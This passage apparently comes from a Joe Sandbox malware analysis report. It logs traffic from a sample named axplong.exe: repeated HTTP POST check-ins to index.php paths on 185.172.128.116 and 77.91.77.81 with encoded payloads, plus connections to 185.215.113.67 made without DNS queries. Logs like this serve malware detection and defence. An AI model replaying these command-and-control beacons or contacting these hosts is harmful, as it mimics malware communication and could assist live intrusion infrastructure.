Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30

Source: Joe Sandbox View	IP Address: 185.215.113.67 185.215.113.67
Source: Joe Sandbox View	IP Address: 185.215.113.67 185.215.113.67

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.67
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.67
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.67

Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

